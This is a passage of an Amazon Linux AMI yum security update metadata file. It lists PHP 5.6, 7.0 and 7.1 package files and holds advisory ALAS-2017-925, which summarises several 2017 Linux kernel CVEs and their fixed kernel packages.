arch="i686"><filename>Packages/php56-dba-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-ldap-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-debuginfo" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-bcmath-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-process-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-opcache-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-common" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-dba" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-tidy" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-opcache-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-xml" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xml-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-mcrypt" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mcrypt-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-enchant-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-common-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-gd" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gd-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-gmp" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-intl-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-imap-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-snmp-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-json-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-cli-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-soap-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-process" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-debuginfo" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-debuginfo-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-embedded" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-embedded-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-opcache-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-json-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xml-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-devel-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-ldap-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-odbc" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-bcmath" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-pspell" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pspell-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dba-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-intl-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gmp-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-soap" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-dbg" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dbg-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xmlrpc-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mbstring-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pgsql-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-mysqlnd" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-debuginfo-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-tidy" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-enchant" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-enchant-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-common" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-common-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-imap" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.25-1.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-925</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-925: medium priority package update for kernel</title><issued date="2017-11-18 02:03:00" /><updated date="2017-11-20 21:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15951:
The KEYS subsystem in the Linux kernel before 4.13.10 does not correctly synchronize the actions of updating versus finding a key in the &quot;negative&quot; state to avoid a race condition, which allows local users to cause a denial of service or possibly have unspecified other impact via crafted system calls.
1507539:
CVE-2017-15951 kernel: Race condition in the KEYS subsystem
CVE-2017-15299:
A vulnerability was found in the key management subsystem of the Linux kernel. An update on an uninstantiated key could cause a kernel panic, leading to denial of service (DoS).
1498016:
CVE-2017-15299 kernel: Incorrect updates of uninstantiated keys crash the kernel
CVE-2017-12193:
A flaw was found in the Linux kernel&#039;s implementation of associative arrays introduced in 3.13. This functionality was backported to the 3.10 kernels in Red Hat Enterprise Linux 7. The flaw involved a null pointer dereference in assoc_array_apply_edit() due to incorrect node-splitting in assoc_array implementation. This affects the keyring key type and thus key addition and link creation operations may cause the kernel to panic.
1501215:
CVE-2017-12193 kernel: Null pointer dereference due to incorrect node-splitting in assoc_array implementation
CVE-2017-12190:
It was found that in the Linux kernel through v4.14-rc5, bio_map_user_iov() and bio_unmap_user() in &#039;block/bio.c&#039; do unbalanced pages refcounting if IO vector has small consecutive buffers belonging to the same page. bio_add_pc_page() merges them into one, but the page reference is never dropped, causing a memory leak and possible system lockup due to out-of-memory condition.
1495089:
CVE-2017-12190 kernel: memory leak when merging buffers in SCSI IO vectors
CVE-2017-1000255:
A flaw was found in the Linux kernel&#039;s handling of signal frame on PowerPC systems. A malicious local user process could craft a signal frame allowing an attacker to corrupt memory.
1498067:
CVE-2017-1000255 kernel: Arbitrary stack overwrite causing oops via crafted signal frame
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000255" title="" id="CVE-2017-1000255" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12190" title="" id="CVE-2017-12190" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12193" title="" id="CVE-2017-12193" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15299" title="" id="CVE-2017-15299" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15951" title="" id="CVE-2017-15951" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.9.62" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.62-21.56.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.62" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.62-21.56.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.62" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.62-21.56.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.62" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.62-21.56.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.62" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.62-21.56.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.62" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.62-21.56.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.62" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.62-21.56.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.62" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.62-21.56.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.62" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.62-21.56.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.62" 